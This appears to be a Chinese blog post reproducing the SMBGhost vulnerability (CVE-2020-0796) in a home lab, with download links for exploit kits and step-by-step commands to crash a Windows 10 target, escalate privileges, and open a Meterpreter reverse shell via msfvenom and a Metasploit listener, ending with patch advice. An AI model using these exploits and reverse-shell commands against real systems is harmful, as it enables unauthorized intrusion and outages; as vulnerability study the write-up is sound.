cve-2020-0796(SMB远程代码执行漏洞漏洞)

Author： R0A1NG
发布时间：March 1, 2021
645 views
No comments
3774 words
Categories：漏洞复现渗透

文章最后更新时间为：2021 年 06 月 04 日 09:32:48

## 漏洞简介 ##
漏洞公告显示，SMB 3.1.1协议中处理压缩消息时，对其中数据没有经过安全检查，直接使用会引发内存破坏漏洞，可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行，受黑客攻击的目标系统只需开机在线即可能被入侵。
## 漏洞影响范围 ##
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
## 漏洞检测 ##
奇安信的检测工具：<button class="btn m-b-xs btn-success  " onclick='window.open("https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%9/%E6%A3%80%E6%B5%8B/CVE-2020-0796-Scanner.zip","_blank")'>点击下载</button>
![奇安信永恒之黑检测][1]
github的某脚本：<button class="btn m-b-xs btn-success  " onclick='window.open("https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/%E6%A3%80%E6%B5%8B/SMBGhost-master.zip","_blank")'>点击下载</button>
![github脚本检测][2]
## POC地址 ##
蓝屏攻击<button class="btn m-b-xs btn-success  " onclick='window.open("https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/CVE-2020-0796-PoC-master.zip","_blank")'>点击下载</button>
本地提权<button class="btn m-b-xs btn-success  " onclick='window.open("https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/cve-2020-0796-local_static.zip","_blank")'>点击下载</button>
远程执行shell<button class="btn m-b-xs btn-success  " onclick='window.open("https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/SMBGhost_RCE_PoC-master.zip","_blank")'>点击下载</button>
## 复现 ##
攻击机 kali 192.168.23.140
靶机 win10 192.168.23.139
关闭win10fang'huo'q

- **蓝屏复现**

解压蓝屏攻击POC：
![解压POC压缩包][3]
执行命令：
> python3 CVE-2020-0796.py 192.168.23.139
执行成功，win10蓝屏
![win10蓝屏][4]

- **本地提权**
运行本地提权POC
成功后会打开system权限的窗口
![system权限窗口][5]

- **远程执行shell复现**

解压远程执行shellPOC：
![解压远程执行shellPOC][6]
**1.生成反向链接木马**
> msfvenom -a x64 --platform windows -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.23.140 LPORT=6666 -f python -o shell.txt
等待成功后，会生成一个shell.txt文件，
![生成shell.txt文件][7]
**2.修改exp**
把shell.txt文件里的buf替换成USER_PAYLOAD
![buf替换为USER_PAYLOAD][8]
然后打开exploit.py文件，把下面红圈里的内容换成修改后的shell.txt的内容
![替换内容][9]
保存。
**3.msf监听**
打开msf
> msfconsole
> msf5 > use exploit/multi/handler 
> msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
> msf5 exploit(multi/handler) > set lhost 192.168.23.140
> msf5 exploit(multi/handler) > set lport 6666
> msf5 exploit(multi/handler) > run
然后另开终端，运行POC
> python3 exploit.py -ip 192.168.23.139
等待运行成功，拿到shell
![成功拿到shell][10]
## 漏洞处理 ##
1.及时更新微软针对该漏洞所发布的的修复补丁
2.关闭445端口

[1]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/%E6%A3%80%E6%B5%8B/1.PNG
  [2]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/%E6%A3%80%E6%B5%8B/2.PNG
  [3]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/1.PNG
  [4]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/2.PNG
  [5]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/7.PNG
  [6]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/3.PNG
  [7]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/4.PNG
  [8]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/5.PNG
  [9]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/6.PNG
  [10]: https://gitee.com/r3387/wenyu/raw/master/%EF%BC%88cve-2020-0796%EF%BC%89/exp%E5%A4%8D%E7%8E%B0/8.PNG

Last modification：June 4, 2021